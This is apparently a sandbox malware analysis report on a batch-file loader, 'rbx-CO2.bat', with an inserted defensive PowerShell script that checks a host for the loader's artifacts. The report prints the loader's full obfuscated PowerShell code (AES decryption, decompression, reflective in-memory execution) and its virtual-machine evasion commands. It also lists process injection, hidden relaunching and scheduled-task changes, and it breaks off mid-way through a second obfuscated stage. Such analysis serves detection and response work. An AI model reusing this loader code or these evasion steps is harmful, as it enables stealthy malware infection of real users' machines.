Source: C:\Windows\System32\cmd.exe | Code function: 17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exe | Code function: 17_2_00000253FC43DA18
Source: C:\Windows\System32\cmd.exe | Code function: 17_2_00000253FC432FF0
Source: C:\Windows\System32\conhost.exe | Code function: 18_3_000002A5AF33CC94
Source: C:\Windows\System32\conhost.exe | Code function: 18_3_000002A5AF3323F0
Source: C:\Windows\System32\conhost.exe | Code function: 18_3_000002A5AF33CE18
Source: C:\Windows\System32\conhost.exe | Code function: 18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exe | Code function: 18_2_000002A5AF362FF0
Source: C:\Windows\System32\conhost.exe | Code function: 18_2_000002A5AF36DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EDD78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343E6CE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343E9DA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343E25DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343EE349
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343E3AFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343E2EF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343E36F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD343E2775
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD34666B0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD34666F01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD34664FD1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD34665442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 36_2_00007FFD34660000
Source: C:\Windows\System32\conhost.exe | Code function: 37_3_000001780D3E23F0
Source: C:\Windows\System32\conhost.exe | Code function: 37_3_000001780D3ECE18
Source: C:\Windows\System32\conhost.exe | Code function: 37_3_000001780D3ECC94
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_000001780DD22FF0
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exe | Code function: 38_3_0000020175E8CE18
Source: C:\Windows\System32\dllhost.exe | Code function: 38_3_0000020175E8CC94
Source: C:\Windows\System32\dllhost.exe | Code function: 38_3_0000020175E823F0
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000020175EB2FF0
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000020175EED894
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000020175EE2FF0
Source: C:\Windows\System32\winlogon.exe | Code function: 39_3_000002D0165823F0
Source: C:\Windows\System32\winlogon.exe | Code function: 39_3_000002D01658CC94
Source: C:\Windows\System32\winlogon.exe | Code function: 39_3_000002D01658CE18
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_000002D0165E2FF0
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_000002D016612FF0
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_000002D01661DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2683
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2682
Source: unknown | Process created: Commandline size = 5477
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2683
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2682
Source: Process Memory Space: powershell.exe PID: 6444, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}(
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr | Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr | Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr | Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.49.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4lt
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr | Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.49.dr | Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exeh
Source: System.evtx.49.dr | Binary string: C:\Device\HarddiskVolume3`&
Source: System.evtx.49.dr | Binary string: C:\Device\HarddiskVolume3
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeP**
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.dr | Binary string: N\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr | Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.49.dr | Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.49.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe8
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr | Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr | Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.49.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4A
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.dr | Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.dr | Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine | Classification label: mal100.spyw.evad.winBAT@56/86@2/2
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\3259231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7088
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\4569933
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\2180219
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6444
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
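
The file, scheduled-task and mutex findings above are the host-side artifacts a responder can check for directly. The following PowerShell script is an added example and not part of the Joe Sandbox report or of the sample: it tests for the dropped copy under C:\Windows\$rbx-onimai2, the task file $rbx-FHOIapsb, the Global\Onimai_... mutex the PowerShell stage creates, and the cmd.exe -> "powershell.exe -WindowStyle Hidden" process shape from the process tree. Those names come from the findings on this page; the variable names, the output wording and the choice of checks are this script's own. Run it elevated on the suspect host.

```powershell
# Added example (not part of the report): host check for the artifacts the
# findings above attribute to this sample. Path, task name, mutex name and the
# cmd.exe -> "powershell.exe -WindowStyle Hidden" shape come from those findings;
# everything else here is this script's own assumption. Run elevated.
$Findings = New-Object System.Collections.Generic.List[string]

# 1. Copy of the loader dropped under C:\Windows (single quotes keep the '$' literal).
$drop = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat'
if (Test-Path -LiteralPath $drop) {
    $Findings.Add("dropped loader present: $drop")
    # The report shows the sample writing the Zone.Identifier stream of its copy;
    # record what, if anything, that stream now contains.
    $zone = Get-Content -LiteralPath $drop -Stream Zone.Identifier -ErrorAction SilentlyContinue
    $Findings.Add("Zone.Identifier on copy: " + $(if ($zone) { $zone -join ' ' } else { '<absent>' }))
}

# 2. Scheduled task whose file the report shows being written to System32\Tasks.
$taskName = '$rbx-FHOIapsb'
if (Test-Path -LiteralPath (Join-Path $env:SystemRoot "System32\Tasks\$taskName")) {
    $Findings.Add("task file present: $taskName")
}
$task = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue
if ($task) {
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    $Findings.Add("scheduled task registered: $taskName -> $actions")
}

# 3. Global mutex created by the PowerShell stage (single-instance guard).
$mutexName = 'Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d'
try {
    $m = [System.Threading.Mutex]::OpenExisting($mutexName)
    $m.Dispose()
    $Findings.Add("mutex present, sample likely running: $mutexName")
} catch [System.Threading.WaitHandleCannotBeOpenedException] {
    # no such mutex: nothing holds it right now
} catch [System.UnauthorizedAccessException] {
    $Findings.Add("mutex present but not openable (access denied): $mutexName")
}

# 4. Hidden-window powershell.exe whose parent is cmd.exe, the shape of the
#    'cmd.exe /c echo ... | powershell.exe -WindowStyle Hidden' chain in the report.
foreach ($p in Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'") {
    if ($p.CommandLine -match '(?i)-WindowStyle\s+Hidden') {
        $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($p.ParentProcessId)"
        if ($parent -and $parent.Name -ieq 'cmd.exe') {
            $Findings.Add("hidden powershell.exe PID $($p.ProcessId) spawned by cmd.exe PID $($p.ParentProcessId)")
        }
    }
}

if ($Findings.Count -eq 0) { 'no artifacts of this sample found' } else { $Findings }
```

Two caveats. The report shows the sample injecting code into dllhost.exe and winlogon.exe (VirtualAllocEx, WriteProcessMemory and NtCreateThreadEx in the dllhost.exe function listed above), so answers from a live infected session may be filtered; treat a negative result as weak and confirm file and task presence from an offline image or a clean boot. The hidden-window check in step 4 also fires on legitimate administrative scripts, so it is a pivot for review rather than a verdict on its own.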
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbml4rjv.f1d.ps1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7088 -s 2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7088 -s 2104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+